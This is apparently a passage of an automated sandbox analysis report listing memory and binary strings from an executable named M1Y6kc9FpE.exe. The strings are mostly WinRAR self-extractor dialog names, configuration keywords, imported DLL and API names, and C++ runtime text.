              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoallmemstr_5ad6a5a8-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancelmemstr_ebaaa4c9-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:sizememstr_c8b44eda-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:captionmemstr_8f0151a9-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idokmemstr_a1c523ec-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancelmemstr_3d44459e-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrommemstr_e645ffea-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renametomemstr_d7ac30e5-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:sizememstr_e6f52c9c-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:captionmemstr_a803d239-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordentermemstr_73085e01-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idokmemstr_5aed23ac-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancelmemstr_6d77dff7-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:sizememstr_a1308d4c-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:captionmemstr_d72a10cd-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idokmemstr_4c622ddd-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancelmemstr_ab22a5e7-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:sizememstr_dcd908c8-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:captionmemstr_bb50e364-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1memstr_d740b0eb-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfindmemstr_039eec25-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2memstr_6f72b705-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idokmemstr_c66d285a-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancelmemstr_a87076d4-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dllmemstr_afde2265-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dllmemstr_2a5b2dce-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dllmemstr_49248f9d-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dllmemstr_d4b375e4-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dllmemstr_a0a1d8ff-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppng riched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldlls:ids_extrdictoutmems:ids_suggest64bits:ids_warnings:ids_dictexceedsrams:ids_dictsuggestcancels:ids_extractioncancelled$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensed
lg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfx"staticunknown_folderreplacefiledlgrenamedlg%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg__tmp_rar_sfx_access_check_-el -s2 "-d%s" "-sp%s"runas"memstr_d28e9331-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode.tmpprogramfilesdirsoftware\microsoft\windows\currentversionhidemaxmin@set:userlnk.lnk.infinstall.exesoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dllmemstr_79deae2c-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dllmemstr_30738de6-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dllmemstr_bc0fcbcd-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusivememstr_402531e8-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusivememstr_a2fc7fc1-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusivememstr_9eb12c1f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dllmemstr_6e5633bb-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll0vmemstr_9c232ac1-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikqmemstr_6042c8e2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dllmemstr_34bc940c-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sleepconditionvariablecsmemstr_d91c5f89-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wakeallconditionvariablememstr_489b41b7-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-core-synch-l1-2-0.dllkernel32.dllsleepconditionvariablecswakeallconditionvariablememstr_04c9fa99-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exceptionmemstr_66b58fcb-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(memstr_e75230ec-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdeclmemstr_82272e45-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascalmemstr_b0b7d8d0-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __stdcallmemstr_aa20544e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __thiscallmemstr_d041c0f4-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __fastcallmemstr_2355ead4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __vectorcallmemstr_a0a20994-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __clrcallmemstr_0664966f-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __eabimemstr_97cc6495-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_1memstr_8ef82cb1-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_2memstr_d0501e55-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_3memstr_d8d2869f-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __ptr64memstr_8499effa-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __restrictmemstr_216556be-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __unalignedmemstr_9b51e969-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: restrict(memstr_3b2c9649-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletememstr_0ed03f72-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operatormemstr_4e4c6ead-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vftable'memstr_f09e6681-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbtable'memstr_5615f950-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vcall'memstr_fc20c213-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `typeof'memstr_605546d4-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static guard'memstr_2a4f7588-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `string'memstr_70d3ce34-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbase destructor'memstr_4fd39082-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector deleting destructor'memstr_ecdd0c3a-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `default constructor closure'memstr_efffd62e-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `scalar deleting destructor'memstr_b35f382a-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector constructor iterator'memstr_b4506b01-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector destructor iterator'memstr_935e3486-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase constructor iterator'memstr_a4a60e1d-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `virtual displacement map'memstr_b00e0888-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector constructor iterator'memstr_c8cd9138-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector destructor iterator'memstr_e151fb83-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase constructor iterator'memstr_cadd193c-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `copy constructor closure'memstr_53cd7b58-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `udt returning'memstr_af0615d7-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rttimemstr_b2c452ff-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable'memstr_4873d059-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable constructor closure'memstr_6f2e4732-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: new[]memstr_24400202-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete[]memstr_afbbbd25-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `omni callsig'memstr_ae43e240-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete closure'memstr_2c5e5a1b-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete[] closure'memstr_70714699-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector constructor iterator'memstr_e5581c35-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector destructor iterator'memstr_80d7e249-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector copy constructor iterator'memstr_3f49bcd7-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase copy constructor iterator'memstr_06d34232-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic initializer for 'memstr_f8014e28-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic atexit destructor for 'memstr_289a5dfb-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector copy constructor iterator'memstr_8e756de8-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase copy constructor iterator'memstr_6a723b43-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector copy constructor iterator'memstr_609ccf50-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static thread guard'memstr_b02ca2ee-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator "" memstr_8657a4f2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator co_awaitmemstr_642d5f30-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator<=>memstr_0f2a5332-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: type descriptor'memstr_788ef632-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class descriptor at (memstr_e0040098-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class array'memstr_91b046f0-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: class hierarchy descriptor'memstr_097013b2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: complete object locator'memstr_3d217c86-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `anonymous namespace'memstr_09d984a7-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace' memstr_4ebee6cc-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0api-ms-memstr_a3c879dc-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsallocmemstr_ca7d2504-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsfreememstr_dc8a318b-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsgetvaluememstr_7f1892a4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flssetvaluememstr_8c3c6f81-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializecriticalsectionexmemstr_8f3b6ca2-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ( 8pxmemstr_0d05f183-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 50p( 8pxmemstr_3a3765d6-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 700wpmemstr_b85e1fa6-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````memstr_a30e9606-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xpxxxxmemstr_dfc02893-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````xpxxxxmemstr_ddc3d994-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)memstr_fb329e85-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)(null)memstr_3662fdb3-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: corexitprocessmemstr_68912b15-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mscoree.dllcorexitprocess memstr_0c70d10d-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)memstr_bba3003d-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)memstr_9fc6b109-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)memstr_acf3f799-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexwmemstr_793a7efc-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewmemstr_a1ee784d-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimagememstr_84c90c2e-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage]memstr_7722ef31-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagewmemstr_cd1862f5-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessagememstr_79f78c1d-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagewmemstr_4e5b9e31-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3memstr_6e242178-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagewmemstr_9918c188-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6memstr_5703a4f6-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagewmemstr_3fc085aa-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&memstr_57db7fdc-7
